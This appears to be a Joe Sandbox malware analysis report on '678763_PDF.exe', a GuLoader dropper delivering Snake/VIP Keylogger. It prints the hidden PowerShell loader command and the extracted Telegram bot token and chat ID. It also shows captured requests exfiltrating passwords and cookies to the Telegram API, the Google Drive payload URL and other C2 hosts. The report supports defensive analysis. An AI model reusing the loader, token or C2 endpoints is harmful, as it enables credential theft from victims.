Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
678763_PDF.exe

Overview

General Information

Sample name:678763_PDF.exe
Analysis ID:1566735
MD5:42b3eeff606c41053b2b30e6df1baa87
SHA1:8957ac95d71567ccf7d0efc28ddcc944352308d0
SHA256:f3b82a629b1eff8b49edcfb38f2d0cbd0ef366a59a97264eb7b86373a45588c4
Tags:exeGuLoaderuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 678763_PDF.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\678763_PDF.exe" MD5: 42B3EEFF606C41053B2B30E6DF1BAA87)
    • powershell.exe (PID: 7308 cmdline: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Beskftigelsesmssiges.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe" MD5: 42B3EEFF606C41053B2B30E6DF1BAA87)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI", "Chat_id": "7844469787", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000001.00000002.2156462288.000000000A4F3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", CommandLine: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\678763_PDF.exe", ParentImage: C:\Users\user\Desktop\678763_PDF.exe, ParentProcessId: 7272, ParentProcessName: 678763_PDF.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Epigraphic93=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Internist\Hyperimmune.Mus';$Miljerne=$Epigraphic93.SubString(70004,3);.$Miljerne($Epigraphic93) ", ProcessId: 7308, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T16:15:13.419750+010028033053Unknown Traffic192.168.2.449772172.67.177.134443TCP
            2024-12-02T16:15:16.737515+010028033053Unknown Traffic192.168.2.449779172.67.177.134443TCP
            2024-12-02T16:15:23.789550+010028033053Unknown Traffic192.168.2.449797172.67.177.134443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T16:15:09.022615+010028032742Potentially Bad Traffic192.168.2.449745132.226.8.16980TCP
            2024-12-02T16:15:11.710105+010028032742Potentially Bad Traffic192.168.2.449745132.226.8.16980TCP
            2024-12-02T16:15:15.100741+010028032742Potentially Bad Traffic192.168.2.449778132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T16:14:55.175759+010028032702Potentially Bad Traffic192.168.2.449736172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI", "Chat_id": "7844469787", "Version": "4.4"}
            Source: Beskftigelsesmssiges.exe.7852.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendMessage"}
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeReversingLabs: Detection: 15%
            Source: 678763_PDF.exeReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: 678763_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49766 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49839 version: TLS 1.2
            Source: 678763_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %^qm.Core.pdb source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdbL source: powershell.exe, 00000001.00000002.2154422416.00000000080F2000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405C63
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00402910 FindFirstFileW,6_2_00402910
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_004068B4 FindFirstFileW,FindClose,6_2_004068B4

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1476a1d87ad0Host: api.telegram.orgContent-Length: 7046Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49778 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.19.174:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49772 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49797 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 172.67.177.134:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49766 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2003/12/2024%20/%2017:47:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844469787&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd144b65092187Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 02 Dec 2024 15:15:40 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2959403043.0000000023630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2149944779.0000000006F73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2143382911.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: 678763_PDF.exe, Beskftigelsesmssiges.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844
            Source: Beskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D91000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BF4000.00000004.00000020.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2944310987.0000000004DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C
